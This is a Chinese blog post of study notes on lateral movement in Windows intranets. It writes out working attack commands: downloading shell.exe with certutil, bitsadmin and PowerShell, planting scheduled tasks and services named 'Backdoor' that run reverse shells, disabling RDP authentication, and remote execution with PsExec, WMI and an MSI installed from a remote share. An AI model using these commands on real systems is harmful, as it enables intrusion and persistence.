<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="内网渗透之横向移动"><meta name="keywords" content=""><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>内网渗透之横向移动 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E4%B8%AD%E7%9A%84%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93"><span class="toc-number">1.</span> <span class="toc-text">横向移动中的文件传输</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E6%96%87%E4%BB%B6%E5%85%B1%E4%BA%AB"><span class="toc-number">1.1.</span> <span class="toc-text">通过文件共享</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E5%BB%BASMB%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-number">1.2.</span> <span class="toc-text">搭建SMB服务器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E5%B7%A5%E5%85%B7"><span class="toc-number">1.3.</span> <span class="toc-text">通过Windows自带工具</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-number">2.</span> <span class="toc-text">创建计划任务</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E5%88%A9%E7%94%A8"><span class="toc-number">2.1.</span> <span class="toc-text">常规利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UNC%E8%B7%AF%E5%BE%84%E5%8A%A0%E8%BD%BD"><span class="toc-number">2.2.</span> <span class="toc-text">UNC路径加载</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1"><span class="toc-number">3.</span> <span class="toc-text">利用系统服务</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1"><span class="toc-number">3.1.</span> <span class="toc-text">创建远程服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SCShell"><span class="toc-number">3.2.</span> <span class="toc-text">SCShell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%B0%83%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">远程桌面调用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#RDP-Hijack"><span class="toc-number">4.1.</span> <span class="toc-text">RDP Hijack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sharp-RDP"><span class="toc-number">4.2.</span> <span class="toc-text">sharp RDP</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PSExec"><span class="toc-number">5.</span> <span class="toc-text">PSExec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WMI"><span class="toc-number">6.</span> <span class="toc-text">WMI</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">6.1.</span> <span class="toc-text">常规利用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="toc-number">6.2.</span> <span class="toc-text">常见利用工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WMI%E4%BA%8B%E4%BB%B6%E8%AE%A2%E9%98%85%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">6.3.</span> <span class="toc-text">WMI事件订阅的利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DCOM%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">7.</span> <span class="toc-text">DCOM的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MMC20-Application"><span class="toc-number">7.1.</span> <span class="toc-text">MMC20.Application</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ShellWindows"><span class="toc-number">7.2.</span> <span class="toc-text">ShellWindows</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Excel-Application"><span class="toc-number">7.3.</span> <span class="toc-text">Excel.Application</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ShellBrowserWindow"><span class="toc-number">7.4.</span> <span class="toc-text">ShellBrowserWindow</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Impacket%E9%87%8C%E7%9A%84dcomexec-py%E8%84%9A%E6%9C%AC"><span class="toc-number">7.5.</span> <span class="toc-text">Impacket里的dcomexec.py脚本</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WinRM%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">8.</span> <span class="toc-text">WinRM的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87WinRM%E6%89%A7%E8%A1%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4"><span class="toc-number">8.1.</span> <span class="toc-text">通过WinRM执行远程命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Evil-Winrm"><span class="toc-number">8.2.</span> <span class="toc-text">Evil-Winrm</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92"><span class="toc-number">9.</span> <span class="toc-text">哈希传递</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">9.1.</span> <span class="toc-text">哈希传递攻击的利用</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/kakashi-cat.jpg"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Dar1in9s">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">75</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">15</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">14</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://gryffinbit.top">Gryffinbit</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">内网渗透之横向移动</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-05</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">5k</span><span class="post-meta__separator">|</span><span>阅读时长: 18 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这是《内网渗透体系建设》学习笔记，第五篇：横向移动</p>
<span id="more"></span>

<h2 id="横向移动中的文件传输"><a href="#横向移动中的文件传输" class="headerlink" title="横向移动中的文件传输"></a>横向移动中的文件传输</h2><h3 id="通过文件共享"><a href="#通过文件共享" class="headerlink" title="通过文件共享"></a>通过文件共享</h3><p>执行<code>net share</code>命令，可以获得Windows默认开启的网络共享，其中<code>C$</code>为C盘共享，<code>ADMIN$</code>为系统目录共享，还有一个<code>IPC$</code>共享。</p>
<p>IPC（Internet Process Connection）是共享”命令管道”的资源，为了让进程间通信而开放的命令管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。</p>
<p>实战中往往会建立<code>IPC$</code>连接，因为通过<code>IPC$</code>连接，不仅可以进行所有文件共享操作，还可以实现其他远程管理操作，如列出远程主机进程、在远程主机上创建计划任务或服务等。<br>建立<code>IPC$</code>连接需要具备以下两个条件：①远程主机开启了IPC连接 ②远程主机的139端口和445端口开放</p>
<p>建立IPC连接：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\10.10.10.19\IPC$ &quot;password&quot; /user:&quot;Administrator&quot;</span><br></pre></td></tr></table></figure>

<p>查看已连接的IPC</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use</span><br></pre></td></tr></table></figure>

<p>连接之后，就可以使用文件命令进行操作</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">dir \\10.10.10.19\C$</span><br><span class="line"></span><br><span class="line">copy ./shell.exe \\10.10.10.19\C$\Users\Public</span><br></pre></td></tr></table></figure>


<h3 id="搭建SMB服务器"><a href="#搭建SMB服务器" class="headerlink" title="搭建SMB服务器"></a>搭建SMB服务器</h3><p>SMB（Server Message Block，服务器消息块），又称CIFS（Common Internet File System，网络文件共享系统），主要功能是使网络上的计算机能够共享计算机文件、打印机、串行端口和通信等资源。SMB消息一般使用NetBIOS协议或TCP发送，分别使用端口139或445，目前倾向于使用445端口。</p>
<p>在linux上，可以通过 <a target="_blank" rel="noopener" href="https://github.com/fortra/impacket/blob/master/impacket/smbserver.py">https://github.com/fortra/impacket/blob/master/impacket/smbserver.py</a> 来搭建smb服务器。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mkdir /root/smbshare</span><br><span class="line">python smbserver.py mysmb /root/smbshare -smb2support</span><br></pre></td></tr></table></figure>


<h3 id="通过Windows自带工具"><a href="#通过Windows自带工具" class="headerlink" title="通过Windows自带工具"></a>通过Windows自带工具</h3><p><strong>Certutil</strong><br>Certutil 是Windows自带的命令行工具，用于管理Windows证书并作为证书服务器的一部分安装。Certutil提供了从网络下载文件的功能。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil -urlcache -split -f http://192.168.1.1:8000/shell.exe c:\users\public\shell.exe</span><br></pre></td></tr></table></figure>

<p><strong>BITSAdmin</strong></p>
<p>BITSAdmin用于创建、下载和上传作业，监视其进度。Windows7及以后的系统自带BitsAdmin工具。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer test http://192.168.1.1:8000/shell.exe c:\users\public\shell.exe</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">创建一个名为<span class="built_in">test</span>的bitsadmin任务，下载shell.exe</span></span><br></pre></td></tr></table></figure>

<p><strong>powershell</strong></p>
<p>通过创建WebClient对象来实现文件下载</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(New-Object Net.WebClient).DownloadFile(&quot;http://192.168.1.1:8000/shell.exe&quot;, &quot;c:\users\public\shell.exe&quot;)</span><br><span class="line"></span><br><span class="line">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&#x27;http://192.168.1.1:8000/shell.exe&#x27;,&#x27;c:\users\public\shell.exe&#x27;)&quot;</span><br></pre></td></tr></table></figure>


<h2 id="创建计划任务"><a href="#创建计划任务" class="headerlink" title="创建计划任务"></a>创建计划任务</h2><h3 id="常规利用"><a href="#常规利用" class="headerlink" title="常规利用"></a>常规利用</h3><p>可以通过已建立的IPC连接，在远程主机上创建计划任务，让目标主机在规定的时间或周期内执行特定操作。</p>
<p>操作步骤：</p>
<ol>
<li><p>利用已建立的IPC连接上传后门程序</p>
</li>
<li><p>利用已建立的IPC连接或指定用户凭据的方式在远程主机上创建计划任务</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 10.10.10.100 /TN Backdoor /SC minute /MO 1 /TR C:\users\pubilc\reverse_tcp.exe /RN System /F</span><br><span class="line"><span class="meta"># </span><span class="language-bash">/S 指定要连接的系统； /TN 指定计划任务的名称</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/SC 指定计划任务执行频率；  /MO 指定计划任务执行周期</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/TR 指定计划任务执行程序；  /RU 指定计划任务运行的用户权限</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">/F  如果指定的任务已存在，则强制创建</span></span><br></pre></td></tr></table></figure>
<p> 如果没有建立IPC连接，则需要指定远程主机的用户凭据</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 10.10.10.100 /TN Backdoor /SC minute /MO 1 /TR C:\users\pubilc\reverse_tcp.exe /RN System /F /U Administrator /P Admin@2012</span><br></pre></td></tr></table></figure>
</li>
<li><p>创建完成后，可以等待计划任务自行执行，也可以立即启动计划任务</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /RUN /S 10.10.10.100 /I /TN Backdoor</span><br></pre></td></tr></table></figure></li>
<li><p>查看计划任务</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /query /S 10.10.10.100 /TN Backdoor</span><br></pre></td></tr></table></figure></li>
<li><p>删除计划任务</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Delete /S 10.10.10.100 /TN Backdoor /F</span><br></pre></td></tr></table></figure></li>
</ol>
<p>也可以通过计划任务执行系统命令，将执行结果写入文件，然后使用type命令查看文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 10.10.10.100 /TN Backdoor /SC minute /MO 1 /TR &quot;c:\windows\system32\cmd.exe /c &#x27;whoami&#x27; &gt; c:\users\public\result.txt&quot; /RN System /F</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">type \\10.10.10.100\C$\users\public\result.txt</span><br></pre></td></tr></table></figure>


<h3 id="UNC路径加载"><a href="#UNC路径加载" class="headerlink" title="UNC路径加载"></a>UNC路径加载</h3><p>Windows系统使用UNC路径来访问网络共享资源，格式为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">\\servername\sharename\directory\filename</span><br><span class="line"># servername 服务器； sharename 网络共享名字</span><br></pre></td></tr></table></figure>

<p>攻击载荷在远程主机上时，可以直接使用UNC路径代替常规的本地路径，让目标主机直接在测试人员搭建的Smb共享中加载攻击载荷并执行。这样可以省去手动上传载荷的步骤。</p>
<p>例如：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 10.10.10.100 /TN Backdoor /SC minute /MO 1 /TR \\192.168.100.100\mysmb\reverse_tcp.exe /RN System /F</span><br></pre></td></tr></table></figure>


<h2 id="利用系统服务"><a href="#利用系统服务" class="headerlink" title="利用系统服务"></a>利用系统服务</h2><h3 id="创建远程服务"><a href="#创建远程服务" class="headerlink" title="创建远程服务"></a>创建远程服务</h3><p>创建远程服务需要拥有<strong>两端主机的管理员权限</strong>和IPC连接，具体操作：</p>
<ol>
<li><p>利用已建立的共享连接向远程主机上传攻击载荷</p>
</li>
<li><p>利用已建立的IPC连接在远程主机上创建系统服务</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">    sc \\192.168.30.132 create Backdoor binpath= &quot;cmd.exe /k c:\users\public\reverse_tcp.exe&quot;</span><br><span class="line">    # binpath的等号后面需要有一个空格</span><br><span class="line">    ```  </span><br><span class="line">3. 启动服务</span><br><span class="line">    ```shell</span><br><span class="line">    sc \\192.168.30.132 start Backdoor</span><br></pre></td></tr></table></figure>
</li>
<li><p>删除服务</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.30.132 delete Backdoor</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="SCShell"><a href="#SCShell" class="headerlink" title="SCShell"></a>SCShell</h3><h2 id="远程桌面调用"><a href="#远程桌面调用" class="headerlink" title="远程桌面调用"></a>远程桌面调用</h2><p>远程桌面协议（Remote Desktop Protocol，RDP）</p>
<p>查询注册表确定是否主机开启了远程桌面</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">若字段值为0，则表示已启动RDP；若为1，则表示禁用RDP</span></span><br></pre></td></tr></table></figure>

<p>开启远程桌面</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">开启远程桌面</span></span><br><span class="line">reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">关闭“仅允许运行使用网络级别身份验证的远程桌面的计算机连接”（鉴权）</span></span><br><span class="line">reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v UserAuthentication /t REG_DWORD /d 0 </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">设置防火墙策略放行3389端口</span></span><br><span class="line">netsh advfirewall firewall add rule name=&quot;Remote Desktop&quot; protocol=TCP dir=in localport=3389 action=allow</span><br></pre></td></tr></table></figure>


<p>对于远程主机，可以通过WMI来开启远程桌面功能</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /Node:192.168.30.135 /User:Administrator /Password:Admin2012 RDTOGGLE WHRER ServerName=&#x27;win2016&#x27; call SetAllowTSConnections 1</span><br></pre></td></tr></table></figure>

<h3 id="RDP-Hijack"><a href="#RDP-Hijack" class="headerlink" title="RDP Hijack"></a>RDP Hijack</h3><p>Windows系统下，<code>tscon</code>可被用来切换远程桌面的会话。正常情况下，切换会话时需要提供登录密码，但通过特殊的利用方法能够绕过验证，不输入密码实现未授权登录。</p>
<p>可以通过<code>query user</code>来列出所有登录的用户列表，得到id</p>
<p>在SYSTEM权限下，使用<code>tscon &lt;ID&gt;</code>来切换用户不需要验证密码。</p>
<h3 id="sharp-RDP"><a href="#sharp-RDP" class="headerlink" title="sharp RDP"></a>sharp RDP</h3><p><a target="_blank" rel="noopener" href="https://github.com/0xthirteen/SharpRDP">https://github.com/0xthirteen/SharpRDP</a></p>
<p>sharp rdp可以通过远程桌面协议在远程主机上执行系统命令，且不需要GUI客户端。</p>
<p>工具需要远程主机开启远程桌面功能，且防火墙放行3389端口</p>
<h2 id="PSExec"><a href="#PSExec" class="headerlink" title="PSExec"></a>PSExec</h2><p>psExec是微软官方提供的一个Windows远程控制工具，可以根据凭据在远程系统上执行管理操作，并且可以获得与命令行几乎相同的实时交互性。</p>
<p>PsExec的原理是通过SMB连接到服务端的<code>Admin$</code>共享，并释放名为”psexecsvc.exe”的二进制文件，然后注册名为”PSEXECSVC”服务。当客户端执行命令时，服务端通过PSEXECSVC服务启动相应的程序执行命令并回显数据。运行结束后，PSEXECSVC服务会被删除。</p>
<p>使用PSEXEC进行远程操作需要以下条件：</p>
<ol>
<li>远程主机开启了<code>Admin$</code>共享</li>
<li>远程主机未开启防火墙或放行了445端口</li>
</ol>
<p>用法：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe -accepteula \\192.168.30.135 -u hackme\Administrator -p Admin2012 -s cmd.exe</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-accepteula 禁止弹出许可证对话框</span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">-s 以SYSTEM权限启动进程</span></span><br></pre></td></tr></table></figure>

<p>如果已经建立IPC连接，那么可以直接使用psexec连接远程主机</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psexec.exe -accepteula \\192.168.30.135 -s cmd.exe</span><br></pre></td></tr></table></figure>


<h2 id="WMI"><a href="#WMI" class="headerlink" title="WMI"></a>WMI</h2><p>WMI（Windows Management Instrumentation，Windows管理规范）时一项核心的Windows管理技术。用户可以通过WMI管理本地和远程主机。</p>
<p>Windows为传输WMI数据提供了两个可用的协议：分布式组件对象模型（Distributed Component Object Model, DCOM）和Windows远程管理（Window Remote Management，WinRM）使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等操作都能远程运行。</p>
<p>在横向移动时，可以利用WMI提供的管理功能，通过以获取的用户凭据，与本地或远程主机进行交互，并控制其执行各种行为。目前两种常见的利用方法：<br>1、 通过调用WMI的类方法进行远程调用，如<code>Win32_Process</code>类中的<code>Create</code>方法可以在远程主机上创建进程，<code>Win32_Product</code>类的<code>Install</code>方法可以在远程主机上安装恶意的MSI<br>2、 远程部署WMI事件订阅，在特定事件发生时触发</p>
<p>利用WMI进行横向移动需要具备以下条件：<br>1、远程主机的WMI服务为开启状态（默认开启）<br>2、远程主机防火墙放行135端口，这是WMI管理的默认端口</p>
<h3 id="常规利用方法"><a href="#常规利用方法" class="headerlink" title="常规利用方法"></a>常规利用方法</h3><p>在windows上可以通过wmic.exe和powershell cmelet来使用wmi数据和执行WMI方法。<br>wmic.exe是一个与WMI进行交互的命令行工具，拥有大量的WMI对象的默认别名，可以执行许多复杂的查询。powershell也提供了许多可以与WMI进行交互的cmelet，如<code>Invoke-WmiMethod</code>、<code>Set-WmiInstance</code>等</p>
<p><strong>执行远程查询</strong></p>
<p>通过WMI查询远程主机上运行的进程信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:192.168.30.135 /user:Administrator /password:Admin2012 process list brief</span><br><span class="line"><span class="meta"># </span><span class="language-bash">/node 执行远程主机的地址</span></span><br></pre></td></tr></table></figure>

<p><strong>创建远程进程</strong><br>通过调用<code>Win32_Process.Create</code>方法在远程主机上创建进程，启动CMD来执行命令</p>
<blockquote>
<p>由于WMIC在执行命令时没有回显，因此可以将执行结果写入文件，然后通过别的方式读取文件</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:192.168.30.135 /user:Administrator /password:Admin2012 process call create &quot;cmd.exe /c ipconfig &gt; C:\result.txt&quot;</span><br></pre></td></tr></table></figure>

<p><strong>远程安装MSI文件</strong><br>通过调用<code>Win32_Product.Install</code>方法，可以控制远程主机安装恶意MSI文件，从而获得权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:192.168.30.135 /user:Administrator /password:Admin2012 product call install PackageLocation=&quot;\\192.168.30.100\mysmb\reverse_tcp.msi&quot;</span><br></pre></td></tr></table></figure>

<h3 id="常见利用工具"><a href="#常见利用工具" class="headerlink" title="常见利用工具"></a>常见利用工具</h3><p><strong>WmiExec</strong></p>
<p>Impacket项目的Wmiexec.py能够以全交互或半交互的方式，通过WMI在远程主机上执行命令。该工机需要远程主机开启135和445端口，其中445端口用于传输命令执行的回显。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python wmiexec.py Hackme/Administrator:Admin2012@192.168.30.132</span><br></pre></td></tr></table></figure>

<p><strong>Invoke-WmiCommand</strong></p>
<h3 id="WMI事件订阅的利用"><a href="#WMI事件订阅的利用" class="headerlink" title="WMI事件订阅的利用"></a>WMI事件订阅的利用</h3><p>WMI提供了强大的事件处理系统，几乎可以用于操作系统上发生的任何事件做出相应。</p>
<p>当创建某进程时，通过WMI事件订阅器来执行预先设置的脚本。<br>其中触发事件的具体条件被称为“<strong>事件过滤器</strong>”（Event Filter），如用户登录、新进程创建等；对指定事件发生做出相应的称为“<strong>事件消费者</strong>”（Event Consumer），包括一系列具体的操作，如运行脚本、记录日志、发送邮件等。<br>在部署事件订阅时，需要分别构建Filter和Consumer两部分，并将两者绑定在一起。</p>
<p>所有的事件过滤器都被存储在一个<code>Root\subscription:__EventFiilter</code>对象的实例，可以通过创建<code>__EventFilter</code>对象实例来部署事件过滤器。事件消费者是基于<code>ROOT\subscription:__EventConsumer</code>系统类派生来的类。</p>
<p>系统提供了常用的标准事件消费类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">LogFileEventConsumer    # 将事件数据写入指定的日志文件</span><br><span class="line">ActiveScriptEventConsumer    # 执行嵌入的VBScript或JavaScript</span><br><span class="line">NTEventLogEventConsumer      # 创建一个包含事件数据的事件日志条目</span><br><span class="line">SMTPEventConsumer            # 发送一封包含事件数据的电子邮件</span><br><span class="line">CommandLineEventConsumer     # 执行指定的系统命令</span><br></pre></td></tr></table></figure>


<p><strong>Sharp-WMIEvent</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/wh0Nsq/Sharp-WMIEvent">https://github.com/wh0Nsq/Sharp-WMIEvent</a></p>
